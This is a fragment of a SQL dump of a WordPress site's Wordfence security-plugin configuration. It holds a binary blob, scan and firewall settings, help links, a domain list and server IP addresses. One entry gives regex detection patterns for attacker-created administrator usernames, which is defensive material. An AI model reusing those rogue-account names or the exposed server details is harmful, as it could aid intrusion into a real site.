��5\'���K���w���˗����D�J��|�v�B��C�20�X�Y�6�U�o>�P?��X�q�B�8D�a��b�D�ic�bK-X���K��}H�-�b\"I�36S��0M�{U��,]�絧��}D�/o�bߧ����\n����N������K��H���{Ta��Ha�Q��=ܧ�=械ߴ�p�R�p�)���pR��p�5Vx�7+<�9��C^>�\n/?m��p�¯�C�ﭦ�*�^sT�y�@<S�nU};��g)΋r�).�G*B+S�bEx���2�Vq�cJqe(Xq���\"�n��Fq�\"v�@����7lR���Yq�r��v��\"�q@�t�\"��\"EU�H�>Td\0���)��R��~T�̄*r34��ˊ���k����]Q�IWQn��(�)��*�G����^C�J�\"Eef���u��ꨨn������x���󮢱^K�챢�l�⥎��U�M�k3����׍�-$�����{o[E[t��3?N���蚹��ި��p�W�#�S��*>��+���(jl�����)��bt��bl����}�dزb���y���ի��wV��=����\0��T\0\Z�\n��\Zb�@�R O)PK�x��\n�6a�\n\"篂**�)k|���~��Fg*����]�k�V�\n�B�;�PޥP��R(f��3j���\0Ŋ�7�J#M�RP�\\u%^�j��T��+�w�+�]t��^���D��a�\\czN��3N��S���S��أ\\�5�Ԣ?U��W�5+u�Օ����=+7��Qnn�Pn�LVn�JW��v\\��ոr�TO��v����_��OJC�r��K�>-�r���rߵ*�����8���� \r�<ȉV���T��Q���T��S*;��tRZ�VZ����(mΚ+�N*�c�v�E�}U��(#N�l-P:Sݕ.�T����k�/���\r���\\選��rئ�B�P�l\\�<�$V�~}Ry��M�\'��<+��pWԅ*���`�z�9�t��ʋ\r�ʰ����AG�W[_(#��+�\no)�K�)of�S��(o�T*�\r��o�)K��+���5��t�)��y�2��2�1[��mV�emR�w�*ߤ(�����Z�)KW�(K�}ʚ�\'�5,o��ov�ڕ|e퇲NT>�ݩ|�{M��蠲!�W�H�R>�8�|~�G�\"gV���|�6U����������_����}T����O�nЭl��Wv�R�݉iʾȫʏeB�r���?��T�UYQ�\Z�#���#�p�-_�%��r\"���k��r2���D~UN�Ӕ�lu��W�k�)��)3��s�m���-.J\0����J	�����WBn�)a�KJ8���U�ܥP\"[�(��J��q%�앒$\nP�m�*)&�Ԑ%�\\ɜ����u*��h���C)��O��X�r�!bq�\Z��x >��EC�+�r�Ji�4.��8\\CK\"B	����N�II�H���T$\r�%�P�T$Rtҥ�z�������ѠPz��n�ng@�(%虳z��C���Qe軣���@��(�����hP�-/��ˠy���g��Z��`�|W����A;��=]Л�z�,�~�_R\r��`�F�]�Q}r�p`<�=�۹`�c$L�5�i%\'a��50c�\'�N��yf`��1Xt����:eX��\0���]����y��m�-=v���`�k���0�e,P+G�����,}4\n����n�u\\���*�e�n1�_<��﯁��R�^�`����t�Y�|����d�;i�C�}��g�F}?�=6���&���q:l�U��D�6u��Nm�9��>����q�aot*x�B D\'B�o@H����*84J�L����p�D�g?9eD;�A�_eS}b�,�ؽ��\rq�VB��E�wU���8b$N2�$�H�Rgg���P#87k=��}.��Az�\\H_<2�l�Kw��2o��~\\��\nWՕ���pͰnV�@��T�;�����p�3�7�Id���c.�=}��\n��BQX)<�M�G\njP|�<<q_�����=�y���TCx�\'\Z�;~��I�b�p�\\�\0UGW��_�+\'x}��F�@�Q&����4j�B��h��_��@���p����2�M2|w���:[�O�w�s��|z�3��*`�v���֚aOY�J�\n�tB\r{�.�>Nި|�\ZU~t�/;΢��8`�\'���/�A���q!v�����Q{P#�7��W����hp���Ge����q��8Ƭ��tG�KG��J>�kU�	/\"pb�\Z/Vt�)���$�M��I�6N���iW4p�h\r��Q4�[����,`�Q��9C��Wh~�Z\\�-���)Z^|��izh�2���F�2�*�C;�l�/:���p�K9.�\r��U�!��i�=tz:W�MD�wQ�\Z�=\\��G���8=ߏC�/�Kw5z�rB��V\\�7�L\n�5���?{�g��M�Cߜz�߃~���I�1@�?nL��@�+�9�n�x�[�bq�_w���p�5{��o�{����m^���4�4��_p?��3���x0�\Zr���6����%x8���ã�Nv���q�0�[������w�\n�}��#�y�&<��$�C����ɚ�0��?�`��=1c�[��/5�eW+̲�YS�zK=f�`Nb��o읆7�{���oM���?ǻ5���e��{���e%j,�B�Xd\\�����\n|��ş��I?G,�\\�eϻ㳄h|��	��\r�\n�`��5+k�cո]�ҿ_V��X]�\rk<W`��I���o�b]��5��?N��3���������n`Ky~Vٌ��\r���FI�~d�w~H������3\0�t$�{ȓ�I�4�?��n.��}�r�\\E=�3Ii�g�5˔z��B}�:H9/�T��P��i@�Ѥ�M�Ҡq�i�r�\\[B�����5�\"i]J!��H{Y霉�a]7а�wIo�	�=n&��d��L�!/Ȱv>�\r�L����%�4�0M*J�)�\'iʢd�^J&�$���hځ{4�|+M7/����d���溚���dn�L�H\r&d9͐��m�E�}S9�,%��6�G���B��B��E���F9�ϥ�%\Z�ts-M;L˜��yw�ts�U����\\Z�@Վ�eyŇ��eZg�N>�䛹�|�O%?�0�����5���;�6X��Pږ@���}ӂh��ڇ(��?��K�|������Xc:��M��\'P��5�����2:��H�3/PTk�\\	tj�d��+��7�(n�1JP$JPk��E����l�(���Bg����>��J-��Ԇ:?���b�)�Q�5�S�1o�{A]�J���<(kv\"]u�@�^�� �6L�v~���B9���F�Gʝ|�r���[]����2���74P���T��Dz��Å:���*���J�]���OR�g_*\r2��s*�\ZHe��P��-���F��s���=U;���2�u�I�Gһ���L ���?fPÔ�(-����o�Rs�~����h�Km��Kj_��ګ��Ou�U����s@�\\ً�ʆ��p���];-X!��rSYq��?��Φr�=V�g��U��.���yɪ]G��SVmV�uXm~\'�e��A}����<�љ���АJ�Yp�u�M`��<�ڄ�eO`����`�56���#V��a�<�x	����#\r�����<�[��l��̖�x�<a�:O��\'�ڰ��d�<Ý\'���)�3٤L���^�3�&�i~ώW`��M<��[&�b+�,��p���{���^0��ZG��;5��t/_W�˃?�\r�RmŮ�&�_�ͫ��N]e��yu�-�qِ=��c����&Bx�e(�����ղ��&{\'�?��bʾ���O�oP��f.�@-\\~����9�]�wm��ݣ����Q����q�8~��C��8tq9�ީ��O{pؚt˨�6|�s&�ٕ�g#G�_��8ҹ�#��	c\r>�Q��S?sL�O>�x�O�[ñ�9V��Oo�����+�p�ݕ���I����N����My����(�s���y��|q���h��}�����Ô�8��&_��f��k-����|{�N��ѓ��w}��|�|�..(�̅;�\"�ü(~ؖΏۺ���\"��pu.7I��E\\�Ѝ+^�s��a~i;�����n���#f��g\\�Ńk5�s��N~S؅�;��n��;��m������>r��Hn�|�C�p��}�4@�?���ֿ����%�Mώ�Y~����^�g3�b�گQ�P���6]Q>Q\'�]���jQ�}!�eWd���5!Q�䄋v��h�g��}O\Z8Wt\"~�XO�)�ݎ2줱��*��4���$�?�C�_���Ā��(�E����H�<8(c*Aƙd�Dj�IˣdJ��Lm6��ފ�5��V�Q�buJSlU��6Ķ���־�w�]�T���)�[�dA�HYx�U��8�*�%�ʲԌeiL�8���ӫ4Y5t���T#�;�WI������ɺ��)	_+KY?{���W��4L��ٺ3M�(J��z�i�(;�%��X�\'�J�z�LҒ��v�И>rx���\rk��x+���.�W���Z9�D5����?�T�P��X-	+NH⑋�XV()k^KJ`����\'�c�%uF��S��i#$ӭH��I��sɪ�\"Y�%r���6\'A�\"$\'*Rr�%ש@�޺ɝ�R�?T$���R01J\n\'ΓBUy�V*u\n�q��<��E�wIqM���HI�gy:�J��<$�cʤ��@��I�~y���Tx{HŶ�RY U�w�e[����BjޚKM�Z�=~B���;���N�E�Mȓ�9(\r�{K�ۏ�О%�.��i��|2� -�����f�R�+��H�_i�>G�f͓�g�k{�|���ʷ�Q�1�]:��HG�\"�n��K��\ZS�� M�Ч$a���ͩ�fl�?�wZjȑ\0','no'),('manualScanType','onceDaily','yes'),('max404Crawlers','DISABLED','yes'),('max404Crawlers_action','throttle','yes'),('max404Humans','DISABLED','yes'),('max404Humans_action','throttle','yes'),('maxExecutionTime','0','yes'),('maxGlobalRequests','DISABLED','yes'),('maxGlobalRequests_action','throttle','yes'),('maxMem','256','yes'),('maxRequestsCrawlers','DISABLED','yes'),('maxRequestsCrawlers_action','throttle','yes'),('maxRequestsHumans','DISABLED','yes'),('maxRequestsHumans_action','throttle','yes'),('migration636_email_summary_excluded_directories','1','no'),('needsNewTour_blocking','1','yes'),('needsNewTour_dashboard','1','yes'),('needsNewTour_firewall','1','yes'),('needsNewTour_livetraffic','1','yes'),('needsNewTour_loginsecurity','1','yes'),('needsNewTour_scan','1','yes'),('needsUpgradeTour_blocking','0','yes'),('needsUpgradeTour_dashboard','0','yes'),('needsUpgradeTour_firewall','0','yes'),('needsUpgradeTour_livetraffic','0','yes'),('needsUpgradeTour_loginsecurity','0','yes'),('needsUpgradeTour_scan','0','yes'),('neverBlockBG','neverBlockVerified','yes'),('noc1ScanSchedule','a:2:{i:0;i:1624675200;i:1;i:1624934400;}','yes'),('notification_blogHighlights','1','yes'),('notification_productUpdates','1','yes'),('notification_promotions','1','yes'),('notification_scanStatus','1','yes'),('notification_securityAlerts','1','yes'),('notification_updatesNeeded','1','yes'),('onboardingAttempt1','','no'),('onboardingAttempt2','','no'),('onboardingAttempt3','','no'),('onboardingAttempt3Initial','0','yes'),('originalScheduledScanStart','1624416001','yes'),('other_blockBadPOST','0','yes'),('other_bypassLitespeedNoabort','0','yes'),('other_hideWPVersion','0','yes'),('other_pwStrengthOnUpdate','1','yes'),('other_scanComments','1','yes'),('other_scanOutside','0','yes'),('other_WFNet','1','yes'),('previousWflogsFileList','[\".htaccess\",\"config.php\",\"config-livewaf.php\",\"rules.php\",\"template.php\",\"config-synced.php\",\"GeoLite2-Country.mmdb\",\"ips.php\",\"attack-data.php\",\"config-transient.php\"]','yes'),('scanFileProcessing','','yes'),('scansEnabled_checkGSB','1','yes'),('scansEnabled_checkHowGetIPs','1','yes'),('scansEnabled_checkReadableConfig','1','yes'),('scansEnabled_comments','1','yes'),('scansEnabled_core','1','yes'),('scansEnabled_coreUnknown','1','yes'),('scansEnabled_diskSpace','1','yes'),('scansEnabled_fileContents','1','yes'),('scansEnabled_fileContentsGSB','1','yes'),('scansEnabled_geoipSupport','1','yes'),('scansEnabled_highSense','0','yes'),('scansEnabled_malware','1','yes'),('scansEnabled_oldVersions','1','yes'),('scansEnabled_options','1','yes'),('scansEnabled_passwds','1','yes'),('scansEnabled_plugins','0','yes'),('scansEnabled_posts','1','yes'),('scansEnabled_scanImages','0','yes'),('scansEnabled_suspectedFiles','1','yes'),('scansEnabled_suspiciousAdminUsers','1','yes'),('scansEnabled_suspiciousOptions','1','yes'),('scansEnabled_themes','0','yes'),('scansEnabled_wafStatus','1','yes'),('scansEnabled_wpscan_directoryListingEnabled','1','yes'),('scansEnabled_wpscan_fullPathDisclosure','1','yes'),('scanStageStatuses','a:11:{s:13:\"spamvertising\";a:4:{s:6:\"status\";s:7:\"premium\";s:7:\"started\";i:0;s:8:\"finished\";i:0;s:8:\"expected\";i:0;}s:4:\"spam\";a:4:{s:6:\"status\";s:7:\"premium\";s:7:\"started\";i:0;s:8:\"finished\";i:0;s:8:\"expected\";i:0;}s:9:\"blacklist\";a:4:{s:6:\"status\";s:7:\"premium\";s:7:\"started\";i:0;s:8:\"finished\";i:0;s:8:\"expected\";i:0;}s:6:\"server\";a:4:{s:6:\"status\";s:16:\"complete-warning\";s:7:\"started\";i:5;s:8:\"finished\";i:5;s:8:\"expected\";i:5;}s:7:\"changes\";a:4:{s:6:\"status\";s:16:\"complete-success\";s:7:\"started\";i:2;s:8:\"finished\";i:2;s:8:\"expected\";i:2;}s:6:\"public\";a:4:{s:6:\"status\";s:16:\"complete-success\";s:7:\"started\";i:2;s:8:\"finished\";i:2;s:8:\"expected\";i:2;}s:7:\"malware\";a:4:{s:6:\"status\";s:16:\"complete-success\";s:7:\"started\";i:2;s:8:\"finished\";i:2;s:8:\"expected\";i:2;}s:7:\"content\";a:4:{s:6:\"status\";s:16:\"complete-success\";s:7:\"started\";i:3;s:8:\"finished\";i:3;s:8:\"expected\";i:3;}s:8:\"password\";a:4:{s:6:\"status\";s:16:\"complete-success\";s:7:\"started\";i:1;s:8:\"finished\";i:1;s:8:\"expected\";i:1;}s:13:\"vulnerability\";a:4:{s:6:\"status\";s:16:\"complete-warning\";s:7:\"started\";i:1;s:8:\"finished\";i:1;s:8:\"expected\";i:1;}s:7:\"options\";a:4:{s:6:\"status\";s:16:\"complete-success\";s:7:\"started\";i:2;s:8:\"finished\";i:2;s:8:\"expected\";i:2;}}','no'),('scanTime','1624620602.0938','yes'),('scanType','standard','yes'),('scan_exclude','','yes'),('scan_include_extra','','yes'),('scan_maxDuration','','yes'),('scan_maxIssues','1000','yes'),('schedMode','auto','yes'),('schedStartHour','4','yes'),('scheduledScansEnabled','1','yes'),('serverDNS','1631582964;300;54.38.72.186','yes'),('serverIP','1624361248;51.77.116.174','yes'),('showAdminBarMenu','1','yes'),('showWfCentralUI','1','yes'),('signatureUpdateTime','1624384413','yes'),('spamvertizeCheck','1','yes'),('ssl_verify','1','yes'),('startScansRemotely','0','yes'),('supportContent','{\"top\":[{\"title\":\"Blocking Troubleshooting\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/blocking\\/troubleshooting\\/\",\"order\":0},{\"title\":\"Optimizing The Firewall\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/optimizing-the-firewall\\/\",\"order\":1},{\"title\":\"Wordfence Web Application Firewall (WAF)\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/\",\"order\":2},{\"title\":\"Scan Troubleshooting\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/scan\\/troubleshooting\\/\",\"order\":3},{\"title\":\"Wordfence and LiteSpeed\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/system-requirements\\/litespeed\\/\",\"order\":4},{\"title\":\"Two-Factor Authentication\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/tools\\/two-factor-authentication\\/\",\"order\":5},{\"title\":\"Firewall Learning Mode\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/learning-mode\\/\",\"order\":6},{\"title\":\"Scan Results\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/scan\\/scan-results\\/\",\"order\":7},{\"title\":\"I am locked out of my site\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/blocking\\/#i-am-locked-out-of-my-site\",\"order\":8},{\"title\":\"PHP Fatal error: Failed opening required wordfence-waf.php\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/#php-fatal-error-failed-opening-required-wordfence-waf-php\",\"order\":9}],\"all\":[{\"title\":\"Wordfence Central\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/central\\/\",\"excerpt\":\"Wordfence Central provides a powerful and efficient way to manage the security of many WordPress sites via a single interface.\",\"children\":[{\"title\":\"Connecting your sites to Wordfence Central\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/central\\/connect\\/\",\"order\":0},{\"title\":\"Setting up two-factor authentication\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/central\\/2fa\\/\",\"order\":1},{\"title\":\"Using the Dashboard page\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/central\\/central\\/\",\"order\":2},{\"title\":\"Using the Configuration page\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/central\\/configuration\\/\",\"order\":3},{\"title\":\"Using Wordfence plugin options Templates\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/central\\/templates\\/\",\"order\":4},{\"title\":\"Using the Settings page\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/central\\/settings\\/\",\"order\":5},{\"title\":\"Using Wordfence Central Teams\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/central\\/teams\\/\",\"order\":6},{\"title\":\"Viewing scan Findings\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/central\\/findings\\/\",\"order\":7}],\"order\":0},{\"title\":\"Dashboard\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/dashboard\\/\",\"excerpt\":\"The Wordfence Dashboard provides insight into the current state of your site’s security.\",\"children\":[{\"title\":\"Options\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/dashboard\\/options\\/\",\"order\":0},{\"title\":\"Alerts\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/dashboard\\/alerts\\/\",\"order\":1}],\"order\":1},{\"title\":\"Firewall\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/\",\"excerpt\":\"The Wordfence Web Application Firewall is a PHP based, application level firewall that filters out malicious requests to your site. \",\"children\":[{\"title\":\"Optimizing\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/optimizing-the-firewall\\/\",\"order\":0},{\"title\":\"Learning Mode\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/learning-mode\\/\",\"order\":1},{\"title\":\"Statistics\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/statistics\\/\",\"order\":2},{\"title\":\"Options\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/options\\/\",\"order\":3},{\"title\":\"MySQLi storage engine\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/mysqli-storage-engine\\/\",\"order\":4},{\"title\":\"Brute Force Protection\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/brute-force\\/\",\"order\":5},{\"title\":\"Rate Limiting\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/rate-limiting\\/\",\"order\":6},{\"title\":\"Troubleshooting\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/troubleshooting\\/\",\"order\":7}],\"order\":2},{\"title\":\"Blocking\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/blocking\\/\",\"excerpt\":\"Aside from the Firewall rules that protect against SQL-injection, XSS and more, Wordfence also has custom features for additional blocking. \",\"children\":[{\"title\":\"Country Blocking\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/blocking\\/country-blocking\\/\",\"order\":0},{\"title\":\"Blocking Troubleshooting\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/blocking\\/troubleshooting\\/\",\"order\":1}],\"order\":3},{\"title\":\"Scan\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/scan\\/\",\"excerpt\":\"A Wordfence scan examines all files on your WordPress website looking for malicious code, backdoors, shells that hackers have installed, known malicious URLs and known patterns of infections.\",\"children\":[{\"title\":\"Options\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/scan\\/options\\/\",\"order\":0},{\"title\":\"Results\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/scan\\/scan-results\\/\",\"order\":1},{\"title\":\"Scheduling\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/scan\\/scheduling\\/\",\"order\":2},{\"title\":\"Troubleshooting\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/scan\\/troubleshooting\\/\",\"order\":3}],\"order\":4},{\"title\":\"Tools\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/tools\\/\",\"excerpt\":\"Wordfence Tools include Two Factor Authentication, Whois Lookup, Password Audit, Live Traffic and Diagnostics.\",\"children\":[{\"title\":\"Import\\/Export\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/tools\\/import-export\\/\",\"order\":0},{\"title\":\"Password Auditing\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/tools\\/password-auditing\\/\",\"order\":1},{\"title\":\"Whois Lookup\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/tools\\/whois-lookup\\/\",\"order\":2},{\"title\":\"Diagnostics\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/tools\\/diagnostics\\/\",\"order\":3},{\"title\":\"Live Traffic\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/tools\\/live-traffic\\/\",\"order\":4},{\"title\":\"Two-Factor Authentication\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/tools\\/two-factor-authentication\\/\",\"order\":5},{\"title\":\"Legacy Two-Factor Authentication\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/tools\\/legacy-two-factor-authentication\\/\",\"order\":6}],\"order\":5},{\"title\":\"Login Security\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/login-security\\/\",\"excerpt\":\"The Login Security page currently contains settings for two-factor authentication (2FA) and reCAPTCHA. In a future Wordfence version, existing login-related features will also move to the same page.\",\"order\":6},{\"title\":\"Advanced\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/\",\"excerpt\":\"If you want to know more about the technical details of Wordfence, you\'ll find the answers in this section.\",\"children\":[{\"title\":\"System requirements\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/system-requirements\\/\",\"order\":0},{\"title\":\"Changelog\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/changelog\\/\",\"order\":1},{\"title\":\"Remove or Reset\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/remove-or-reset\\/\",\"order\":2},{\"title\":\"Technical Details\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/technical-details\\/\",\"order\":3},{\"title\":\"Constants\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/constants\\/\",\"order\":4},{\"title\":\"Wordfence API\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/wordfence-api\\/\",\"order\":5},{\"title\":\"Troubleshooting\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/troubleshooting\\/\",\"order\":6}],\"order\":7},{\"title\":\"Wordfence Premium\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/premium\\/\",\"excerpt\":\"Wordfence Premium comes with an IP Blocklist, Real Time Protection and much more.\",\"children\":[{\"title\":\"Account\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/premium\\/account\\/\",\"order\":0},{\"title\":\"Pricing\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/premium\\/pricing\\/\",\"order\":1},{\"title\":\"License Key\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/premium\\/api-key\\/\",\"order\":2}],\"order\":8},{\"title\":\"Wordfence and GDPR - General Data Protection Regulation\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/general-data-protection-regulation\\/\",\"excerpt\":\"Defiant, the company behind Wordfence, has updated its terms of use, privacy policies and software, as well as made available a data processing agreement to meet GDPR compliance. Customers must review and agree to updated terms in order to continue using our products and services. We also provide a data processing agreement if you qualify as a data controller under the GDPR.\",\"children\":[{\"title\":\"Sub-Processors List\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/general-data-protection-regulation\\/sub-processors-list\\/\",\"order\":0}],\"order\":9},{\"title\":\"Site Cleaning and Security Audits\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/security-services\\/\",\"excerpt\":\"Let one of our Security Analysts help you clean your infected site or inspect it for vulnerabilities.\",\"order\":10},{\"title\":\"Login Security Plugin\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/login-security-plugin\\/\",\"excerpt\":\"The Wordfence Login Security plugin contains a subset of the features found in the full Wordfence plugin: Two-factor Authentication, XML-RPC Protection and Login Page CAPTCHA. It is ideal for sites that need login security functionality but either can’t or don’t want to run the full Wordfence plugin.\",\"order\":11}]}','yes'),('supportHash','dd1bf932be1f0e6be74ae0a208da879ec6c8c47ccb962717a01a796ab6c54463','yes'),('suspiciousAdminUsernames','a:2:{i:0;s:46:\"/^wp\\.service\\.controller(?:\\.[a-zA-Z0-9]+)$/i\";i:1;s:55:\"/^(?:wordpressssadmin|wordprestadmin|jaime.besser56)$/i\";}','yes'),('timeoffset_wf','0','yes'),('timeoffset_wf_updated','1631118544','yes'),('tldlist','|com|org|net|edu|aaa|abb|abc|aco|ads|aeg|afl|aig|anz|aol|app|art|aws|axa|bar|bbc|bbt|bcg|bcn|bet|bid|bio|biz|bms|bmw|bom|boo|bot|box|buy|bzh|cab|cal|cam|car|cat|cba|cbn|cbs|ceo|cfa|cfd|cpa|crs|csc|dad|day|dds|dev|dhl|diy|dnp|dog|dot|dtv|dvr|eat|eco|esq|eus|fan|fit|fly|foo|fox|frl|ftr|fun|fyi|gal|gap|gay|gdn|gea|gle|gmo|gmx|goo|gop|got|gov|hbo|hiv|hkt|hot|how|ibm|ice|icu|ifm|inc|ing|ink|int|ist|itv|jcb|jio|jll|jmp|jnj|jot|joy|kfh|kia|kim|kpn|krd|lat|law|lds|llc|llp|lol|lpl|ltd|man|map|mba|med|men|mil|mit|mlb|mls|mma|moe|moi|mom|mov|msd|mtn|mtr|nab|nba|nec|new|nfl|ngo|nhk|now|nra|nrw|ntt|nyc|obi|off|one|ong|onl|ooo|ott|ovh|pay|pet|phd|pid|pin|pnc|pro|pru|pub|pwc|qvc|red|ren|ril|rio|rip|run|rwe|sap|sas|sbi|sbs|sca|scb|ses|sew|sex|sfr|ski|sky|soy|spa|srl|stc|tab|tax|tci|tdk|tel|thd|tjx|top|trv|tui|tvs|ubs|uno|uol|ups|vet|vig|vin|vip|wed|win|wme|wow|wtc|wtf|xin|xxx|xyz|you|yun|zip|ac|ad|ae|af|ag|ai|al|am|ao|aq|ar|as|at|au|aw|ax|az|ba|bb|bd|be|bf|bg|bh|bi|bj|bm|bn|bo|br|bs|bt|bv|bw|by|bz|ca|cc|cd|cf|cg|ch|ci|ck|cl|cm|cn|co|cr|cu|cv|cw|cx|cy|cz|de|dj|dk|dm|do|dz|ec|ee|eg|er|es|et|eu|fi|fj|fk|fm|fo|fr|ga|gb|gd|ge|gf|gg|gh|gi|gl|gm|gn|gp|gq|gr|gs|gt|gu|gw|gy|hk|hm|hn|hr|ht|hu|id|ie|il|im|in|io|iq|ir|is|it|je|jm|jo|jp|ke|kg|kh|ki|km|kn|kp|kr|kw|ky|kz|la|lb|lc|li|lk|lr|ls|lt|lu|lv|ly|ma|mc|md|me|mg|mh|mk|ml|mm|mn|mo|mp|mq|mr|ms|mt|mu|mv|mw|mx|my|mz|na|nc|ne|nf|ng|ni|nl|no|np|nr|nu|nz|om|pa|pe|pf|pg|ph|pk|pl|pm|pn|pr|ps|pt|pw|py|qa|re|ro|rs|ru|rw|sa|sb|sc|sd|se|sg|sh|si|sj|sk|sl|sm|sn|so|sr|ss|st|su|sv|sx|sy|sz|tc|td|tf|tg|th|tj|tk|tl|tm|tn|to|tr|tt|tv|tw|tz|ua|ug|uk|us|uy|uz|va|vc|ve|vg|vi|vn|vu|wf|ws|ye|yt|za|zm|zw|aarp|able|adac|aero|akdn|ally|amex|arab|arpa|alstom|army|arte|asda|asia|audi|auto|baby|band|bank|bbva|beer|best|bike|bing|blog|blue|bofa|bond|aetna|book|buzz|cafe|call|camp|cars|casa|case|cash|actor|care|adult|cbre|cern|chat|citi|city|club|cool|cymru|alsace|cyou|cards|coop|data|date|dclk|link|live|loan|loft|mini|mint|amfam|chase|cisco|mobi|apple|limo|amica|like|archi|cheap|citic|click|life|codes|crown|deal|dell|game|lidl|love|cloud|coach|ltda|luxe|maif|meme|media|meet|menu|miami|moda|news|next|lotte|lotto|moto|name|navy|boats|nexus|alfaromeo|nico|nike|open|nikon|ninja|page|deals|nokia|ollo|alibaba|pars|bosch|airbus|nowtv|pccw|pink|play|plus|beats|bible|bingo|delta|airtel|baidu|black|lilly|linde|movie|ping|lipsy|money|pics|lixil|loans|locus|pohl|alipay|prod|prof|qpon|raid|read|dabur|dance|pizza|porn|post|phone|photo|place|poker|praxi|press|prime|promo|shia|audio|autos|azure|build|osaka|paris|parts|party|quest|radio|allstate|omega|allfinanz|canon|mango|vana|shoes|shop|show|silk|sina|site|skin|sncf|sohu|song|sony|skype|sling|smart|smile|solar|space|spot|star|sport|stada|store|study|style|surf|talk|sucks|swiss|tatar|taxi|team|teva|tiaa|tips|tires|tirol|tmall|today|tokyo|tools|abarth|abbott|tech|toray|video|abbvie|agency|total|tours|town|toys|trade|vegas|africa|trust|tube|tunes|tushu|ubank|amazon|duck|audible|avianca|brother|dvag|broker|academy|camera|coffee|auspost|channel|dish|author|clinic|docs|earth|anquan|aramco|career|casino|center|chanel|email|boston|edeka|chrome|church|circle|claims|banamex|abudhabi|auction|bananarepublic|comsec|bugatti|accountants|condos|fage|careers|desi|caravan|diet|capital|erni|coupon|dubai|epson|cruise|dunlop|dupont|durban|emerck|expert|accenture|associates|estate|events|attorney|credit|athleta|energy|accountant|dentist|fail|fans|fiat|beauty|fast|fish|florist|food|ferrero|fire|flir|dental|farm|fido|film|ford|frogans|fujitsu|ggee|final|finance|free|fund|gbiz|gent|gift|bayern|bentley|flowers|gmbh|ferrari|gallery|gallo|games|goog|bestbuy|guge|bharti|faith|gold|golf|guru|hair|gifts|futbol|haus|berlin|family|farmers|fashion|hdfc|fedex|design|help|here|hgtv|gives|horse|barclays|forex|green|gripe|barclaycard|gmail|barcelona|gucci|flickr|flights|globo|group|guide|host|honda|hsbc|bostik|drive|glade|glass|homes|hyatt|icbc|forum|booking|immo|yoga|house|ieee|ikano|imdb|lgbt|work|abogado|works|world|doctor|xerox|basketball|zara|zero|bauhaus|dating|datsun|dealer|degree|yahoo|direct|fishing|xbox|fitness|bargains|baseball|education|zone|barefoot|forsale|gallup|kiwi|contact|kddi|land|visa|koeln|google|jprs|kaufen|kinder|kindle|kosher|kpmg|kred|lego|luxury|madrid|maison|makeup|market|mattel|monash|stream|studio|supply|suzuki|swatch|sydney|